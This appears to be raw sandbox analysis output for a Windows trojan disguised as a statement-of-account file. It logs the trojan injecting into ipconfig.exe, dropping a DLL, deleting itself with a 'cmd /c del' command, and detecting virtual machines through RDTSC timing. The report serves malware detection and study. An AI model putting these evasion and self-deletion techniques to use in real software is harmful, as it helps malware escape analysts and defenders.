Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B66E30	3_2_00B66E30
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C0D616	3_2_00C0D616
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C1DFCE	3_2_00C1DFCE
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C11FF1	3_2_00C11FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E122AE	8_2_02E122AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DFFA2B	8_2_02DFFA2B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E0DBD2	8_2_02E0DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E003DA	8_2_02E003DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7EBB0	8_2_02D7EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6AB40	8_2_02D6AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E12B28	8_2_02E12B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E128EC	8_2_02E128EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5B090	8_2_02D5B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E120A8	8_2_02E120A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D720A0	8_2_02D720A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E1E824	8_2_02E1E824
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E01002	8_2_02E01002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6A830	8_2_02D6A830
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4F900	8_2_02D4F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D64120	8_2_02D64120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E12EF7	8_2_02E12EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D66E30	8_2_02D66E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E0D616	8_2_02E0D616
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E11FF1	8_2_02E11FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E1DFCE	8_2_02E1DFCE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E0D466	8_2_02E0D466
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5841F	8_2_02D5841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5D5E0	8_2_02D5D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E125DD	8_2_02E125DD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D72581	8_2_02D72581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E11D55	8_2_02E11D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E12D07	8_2_02E12D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D40D20	8_2_02D40D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265B8D6	8_2_0265B8D6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265BE25	8_2_0265BE25
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02642FB0	8_2_02642FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265CC12	8_2_0265CC12
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02648C90	8_2_02648C90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02642D87	8_2_02642D87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02642D90	8_2_02642D90

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 02D4B150 appears 72 times
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: String function: 00B4B150 appears 48 times

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_004185F0 NtCreateFile,	3_2_004185F0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_004186A0 NtReadFile,	3_2_004186A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00418720 NtClose,	3_2_00418720
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_004187D0 NtAllocateVirtualMemory,	3_2_004187D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041869A NtReadFile,	3_2_0041869A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041871A NtClose,	3_2_0041871A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_004187CA NtAllocateVirtualMemory,	3_2_004187CA
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B898F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_00B898F0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_00B89860
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89840 NtDelayExecution,LdrInitializeThunk,	3_2_00B89840
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B899A0 NtCreateSection,LdrInitializeThunk,	3_2_00B899A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_00B89910
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89A20 NtResumeThread,LdrInitializeThunk,	3_2_00B89A20
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_00B89A00
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89A50 NtCreateFile,LdrInitializeThunk,	3_2_00B89A50
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B895D0 NtClose,LdrInitializeThunk,	3_2_00B895D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89540 NtReadFile,LdrInitializeThunk,	3_2_00B89540
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B896E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_00B896E0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_00B89660
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B897A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_00B897A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89780 NtMapViewOfSection,LdrInitializeThunk,	3_2_00B89780
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89FE0 NtCreateMutant,LdrInitializeThunk,	3_2_00B89FE0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89710 NtQueryInformationToken,LdrInitializeThunk,	3_2_00B89710
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B898A0 NtWriteVirtualMemory,	3_2_00B898A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89820 NtEnumerateKey,	3_2_00B89820
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B8B040 NtSuspendThread,	3_2_00B8B040
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B899D0 NtCreateProcessEx,	3_2_00B899D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89950 NtQueueApcThread,	3_2_00B89950
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89A80 NtOpenDirectoryObject,	3_2_00B89A80
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89A10 NtQuerySection,	3_2_00B89A10
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B8A3B0 NtGetContextThread,	3_2_00B8A3B0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89B00 NtSetValueKey,	3_2_00B89B00
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B895F0 NtQueryInformationFile,	3_2_00B895F0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B8AD30 NtSetContextThread,	3_2_00B8AD30
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89520 NtWaitForSingleObject,	3_2_00B89520
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89560 NtWriteFile,	3_2_00B89560
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B896D0 NtCreateKey,	3_2_00B896D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89610 NtEnumerateValueKey,	3_2_00B89610
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89670 NtQueryInformationProcess,	3_2_00B89670
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89650 NtQueryValueKey,	3_2_00B89650
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89730 NtQueryVirtualMemory,	3_2_00B89730
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B8A710 NtOpenProcessToken,	3_2_00B8A710
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89770 NtSetInformationFile,	3_2_00B89770
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B8A770 NtOpenThread,	3_2_00B8A770
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B89760 NtOpenProcess,	3_2_00B89760
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89A50 NtCreateFile,LdrInitializeThunk,	8_2_02D89A50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89840 NtDelayExecution,LdrInitializeThunk,	8_2_02D89840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_02D89860
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D899A0 NtCreateSection,LdrInitializeThunk,	8_2_02D899A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_02D89910
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D896D0 NtCreateKey,LdrInitializeThunk,	8_2_02D896D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D896E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_02D896E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89FE0 NtCreateMutant,LdrInitializeThunk,	8_2_02D89FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89780 NtMapViewOfSection,LdrInitializeThunk,	8_2_02D89780
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89710 NtQueryInformationToken,LdrInitializeThunk,	8_2_02D89710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D895D0 NtClose,LdrInitializeThunk,	8_2_02D895D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89540 NtReadFile,LdrInitializeThunk,	8_2_02D89540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89A80 NtOpenDirectoryObject,	8_2_02D89A80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89A10 NtQuerySection,	8_2_02D89A10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89A00 NtProtectVirtualMemory,	8_2_02D89A00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89A20 NtResumeThread,	8_2_02D89A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D8A3B0 NtGetContextThread,	8_2_02D8A3B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89B00 NtSetValueKey,	8_2_02D89B00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D898F0 NtReadVirtualMemory,	8_2_02D898F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D898A0 NtWriteVirtualMemory,	8_2_02D898A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D8B040 NtSuspendThread,	8_2_02D8B040
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89820 NtEnumerateKey,	8_2_02D89820
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D899D0 NtCreateProcessEx,	8_2_02D899D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89950 NtQueueApcThread,	8_2_02D89950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89650 NtQueryValueKey,	8_2_02D89650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89670 NtQueryInformationProcess,	8_2_02D89670
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89660 NtAllocateVirtualMemory,	8_2_02D89660
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89610 NtEnumerateValueKey,	8_2_02D89610
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D897A0 NtUnmapViewOfSection,	8_2_02D897A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D8A770 NtOpenThread,	8_2_02D8A770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89770 NtSetInformationFile,	8_2_02D89770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89760 NtOpenProcess,	8_2_02D89760
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D8A710 NtOpenProcessToken,	8_2_02D8A710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89730 NtQueryVirtualMemory,	8_2_02D89730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D895F0 NtQueryInformationFile,	8_2_02D895F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89560 NtWriteFile,	8_2_02D89560
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D8AD30 NtSetContextThread,	8_2_02D8AD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D89520 NtWaitForSingleObject,	8_2_02D89520
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_026586A0 NtReadFile,	8_2_026586A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02658720 NtClose,	8_2_02658720
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_026585F0 NtCreateFile,	8_2_026585F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265869A NtReadFile,	8_2_0265869A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265871A NtClose,	8_2_0265871A

Source: HIRE SOA FOR DEC_2021.exe, 00000001.00000003.667915341.000000001ADD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HIRE SOA FOR DEC_2021.exe
Source: HIRE SOA FOR DEC_2021.exe, 00000001.00000003.663941940.000000001AF6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HIRE SOA FOR DEC_2021.exe
Source: HIRE SOA FOR DEC_2021.exe, 00000003.00000002.728301001.0000000002617000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs HIRE SOA FOR DEC_2021.exe
Source: HIRE SOA FOR DEC_2021.exe, 00000003.00000002.728211881.0000000000DCF000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HIRE SOA FOR DEC_2021.exe
Source: HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727845226.0000000000C3F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HIRE SOA FOR DEC_2021.exe

Source: HIRE SOA FOR DEC_2021.exe	Virustotal: Detection: 41%
Source: HIRE SOA FOR DEC_2021.exe	ReversingLabs: Detection: 37%

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

File read: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Jump to behavior

Source: HIRE SOA FOR DEC_2021.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Process created: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Process created: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"	Jump to behavior

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

File created: C:\Users\user\AppData\Local\Temp\nslEC77.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@11/6

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,

1_2_00402012

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_00404275

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: ipconfig.pdb source: HIRE SOA FOR DEC_2021.exe, 00000003.00000002.728290163.0000000002610000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: HIRE SOA FOR DEC_2021.exe, 00000003.00000002.728290163.0000000002610000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: HIRE SOA FOR DEC_2021.exe, 00000001.00000003.662712540.000000001AE50000.00000004.00000800.00020000.00000000.sdmp, HIRE SOA FOR DEC_2021.exe, 00000001.00000003.664381253.000000001ACC0000.00000004.00000800.00020000.00000000.sdmp, HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727845226.0000000000C3F000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: HIRE SOA FOR DEC_2021.exe, HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727670079.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, HIRE SOA FOR DEC_2021.exe, 00000003.00000002.727845226.0000000000C3F000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041B048 push eax; iretd	3_2_0041B04B
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041B832 push eax; ret	3_2_0041B838
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041B83B push eax; ret	3_2_0041B8A2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041B89C push eax; ret	3_2_0041B8A2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00415B24 push ecx; ret	3_2_00415B69
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00415E10 push ebx; retf	3_2_00415E13
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_0041B7E5 push eax; ret	3_2_0041B838
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B9D0D1 push ecx; ret	3_2_00B9D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D9D0D1 push ecx; ret	8_2_02D9D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02655B24 push ecx; ret	8_2_02655B69
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265B048 push eax; iretd	8_2_0265B04B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265B832 push eax; ret	8_2_0265B838
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265B83B push eax; ret	8_2_0265B8A2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265B89C push eax; ret	8_2_0265B8A2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02655E10 push ebx; retf	8_2_02655E13
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_0265B7E5 push eax; ret	8_2_0265B838

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405DA3

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

File created: C:\Users\user\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd delete

Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: /c del "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: /c del "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"			Jump to behavior

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-3911

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002648614 second address: 000000000264861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 00000000026489AE second address: 00000000026489B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 7116	Thread sleep time: -35000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4228	Thread sleep time: -36000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 3_2_004088E0 rdtsc

3_2_004088E0

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	API coverage: 8.5 %
Source: C:\Windows\SysWOW64\ipconfig.exe	API coverage: 7.5 %

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_00405D7C FindFirstFileA,FindClose,	1_2_00405D7C
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_004053AA
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_00402630 FindFirstFileA,	1_2_00402630

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	API call chain: ExitProcess graph end node			graph_1-3597
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	API call chain: ExitProcess graph end node			graph_1-3601

Source: explorer.exe, 00000005.00000000.679147166.000000000A60E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.708371216.0000000006650000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.679147166.000000000A60E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.673990651.0000000004710000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
